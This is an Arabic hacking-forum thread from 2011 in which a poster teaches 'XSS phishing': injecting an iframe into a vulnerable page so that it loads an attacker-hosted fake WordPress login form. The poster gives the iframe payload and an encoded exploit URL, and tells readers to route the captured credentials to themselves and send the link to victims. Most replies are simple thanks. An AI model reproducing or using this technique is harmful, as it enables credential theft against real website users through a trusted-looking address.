يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-10-2011, 03:33 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 

 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road

. جديد استخدامات xss وهي الـ phishing login


السلام عليكم
هذا استخدام غير معروف لثغرة xss
تعبت في عمل الفيديو والشرح راجاء اعمل تقييم ويمنتنع رودوم من نوع شكراً
الفكرة تعتمد على الدمج بين الصفحات المزورة واترككم مع الفيديو خخخخخخخ

حمل الفيديو من هنا

تحميييييل


~~~~~~~~~~~~~~~~~~~~

~

بسم الله الرحمن الرحيم
السلام عليكم

معكم IronMan من
شبكة العناكب الاحترافية

درسنا اليوم هو عن استغلال شبه غير معروف عن ثغرة XSS وهو XSS phishing
اي الخداع عن طريق هذه الثغرة، طبعا الكل يعرف سرقة الكوكيز ولكن لماذا
لان نستخدم هذه الثغرة في حقن اكواد HTML في الصفحة؟
سنرى الطريقة تابعوا معي

هذا كود بسيط نصبته في local server وصنعت ثغرة xss بسيطة المتغير المصاب هو x قبل ما نحقنه نشوف عدة خطوات وهي انك ترفع صفحة مزورة على موقع ثاني لنقل

httP://mysite.com/phishing.php

لازم تكون من نفس لوحة التحكم للسكربت الحابي تخترقه يعني مثال ويرد برس

نأتي الان لخطوة الحقن وهي استخدام هذا الكود

<****** frameborder=0 src=http://www.yoursite.com/wp-login.php? height=700px width=1250px ></******>

لاحظ رابط الصفحة المزورة يجب ان تتأكد منه وتعدل ه بما يناسبك

لازم تظبط ابعاد الصفحة قبل ما ترسلها يعني صفحة ملغمة
لا تنسى انه كود form action يرسل البيانات لك او يحفظها تقريبا شبيه بخطوات حفظ الكوكيز ، المهم
عندما نحقن الكود اعلاه في الصفحة ستظهر لوحة التحكم ويمكنك ارسالها للمستهدف ، بعد ما تشفر الكود الاخير بأي اداة من ادوات hackbar
تلك لاضافة في الفاير فوكس
ابحث عنها في قوقل ولا تكون كسلان


وليصبح الرابط في النهاية

http://localhost/mblue_u/test.php?x=...E%3C/******%3E

وبكذا ترسلوا الرابط للضحية
او تتفننوا علي كيفيكم مثل ما تسرقون الكوكيز يمكنك ان تصنع صفحة مزورة بهذه الطريقة ول ايشك ابدا حتى لو نظر للعنوان سيجد انه في الموقع
وبكذا انتهى



الدرس
اخوكم / ايرون مان هكر
شبكة العناكب الاحترافية
vbspiders.com/vb/





[]d] hsjo]hlhj xss ,id hgJ phishing login phishing page

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 


التعديل الأخير تم بواسطة bleu moon ; 09-10-2011 الساعة 06:59 PM.

   

رد مع اقتباس
قديم 09-10-2011, 06:52 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


هههه عملت الفيديوا اذن ...
بارك الله فيك ...
لي عوده ...

   

رد مع اقتباس
قديم 09-10-2011, 07:02 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


ينقل الى مرجع تغرات xss

http://www.vbspiders.com/vb/t58067-p...tml#post388177

   

رد مع اقتباس
قديم 09-10-2011, 07:03 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية agentsimo
 

 

 
إحصائية العضو





agentsimo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
agentsimo is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


thxxxx

   

رد مع اقتباس
قديم 09-10-2011, 07:09 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 

 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


لكن كذا دفنت الموضوع كان تتركه اسبوع

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 

   

رد مع اقتباس
قديم 09-10-2011, 07:13 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


هيك احسن هههه

   

رد مع اقتباس
قديم 09-11-2011, 07:58 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 

 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


نو نو ما احسن ولا شيء هذا يعتبر دمج ما بين قسم البريد واختراق المواقع ههههه

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 

   

رد مع اقتباس
قديم 10-13-2011, 03:04 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية hiplorenzo
 

 

 
إحصائية العضو





hiplorenzo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hiplorenzo is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


nice merci bcp

   

رد مع اقتباس
قديم 10-16-2011, 02:41 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية msbhacker
 

 

 
إحصائية العضو





msbhacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
msbhacker is on a distinguished road

تحدي رد: جديد استخدkمات xss وهي الـ phishing login


thanks u very much

   

رد مع اقتباس
قديم 10-18-2011, 12:10 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية samourai_7
 

 

 
إحصائية العضو






samourai_7 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
samourai_7 is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


شـكــ وبارك الله فيك ـــرا لك

   

رد مع اقتباس
قديم 10-24-2011, 01:21 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
إحصائية العضو






يحيى زكريا غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
يحيى زكريا is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


موضوع اكثر من رائع

   

رد مع اقتباس
قديم 11-14-2011, 02:00 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية RyaX
 

 

 
إحصائية العضو






RyaX غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
RyaX is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


ماد لو حطية باتش بدل الصفح

   

رد مع اقتباس
قديم 11-14-2011, 10:31 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
إحصائية العضو








دام علاء العماد غير متواجد حالياً

إرسال رسالة عبر Skype إلى دام علاء العماد

 

 

إحصائية الترشيح

عدد النقاط : 10
دام علاء العماد is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


بارك الله فيك يا أخي الكريم على هذا الدرس القيم و جزاك الله عنا خير الجزاء

   

رد مع اقتباس
قديم 12-05-2011, 06:20 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية bigotoo
 

 

 
إحصائية العضو






bigotoo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
bigotoo is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


مشكـــــور تسلم ثغرة حلوة

   

رد مع اقتباس
قديم 12-07-2011, 07:53 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية dal3_3ny
 

 

 
إحصائية العضو






dal3_3ny غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dal3_3ny is on a distinguished road

افتراضي رد: جديد استخدامات xss وهي الـ phishing login


thanxxxxxxxxxxxxxxxxxx

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
login, phishing page, xss

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 09:01 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0